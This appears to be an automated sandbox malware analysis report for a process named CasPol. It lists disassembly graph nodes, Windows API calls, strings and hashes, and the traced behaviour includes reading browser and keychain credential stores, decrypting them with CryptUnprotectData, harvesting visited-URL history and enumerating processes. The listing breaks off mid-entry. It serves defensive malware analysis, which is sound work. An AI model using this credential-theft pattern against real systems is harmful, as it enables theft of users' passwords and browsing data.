64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                          • API String ID: 4101496090-3798722523
                                                                                                                                                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                          • API String ID: 1297422669-2783969131
                                                                                                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                          • API String ID: 3536422406-1740548384
                                                                                                                                                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                          • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                          • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 573 446747-44674b 570->573 574 446728-44672d 570->574 578 4467ac-4467b7 __setusermatherr 571->578 579 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 571->579 573->569 577 44674d-44674f 573->577 574->569 576 446734-44673b 574->576 576->569 580 44673d-446745 576->580 581 446755-446758 577->581 578->579 584 446810-446819 579->584 585 44681e-446825 579->585 580->581 581->571 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 591 446834-446838 587->591 592 44683a-44683e 587->592 589 446845-44684b 588->589 590 446872-446877 588->590 596 446853-446864 GetStartupInfoW 589->596 597 44684d-446851 589->597 590->588 591->587 591->592 592->589 594 446840-446842 592->594 594->589 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 639 40e1e8-40e1fa call 406e8f 636->639 643 40e270-40e27d call 406b53 639->643 644 40e1fc-40e219 call 40dd50 * 2 639->644 643->639 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 652 40e291-40e294 call 40aa04 649->652 653 40e288-40e290 free 649->653 652->637 653->652 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                                                                          • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                          • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
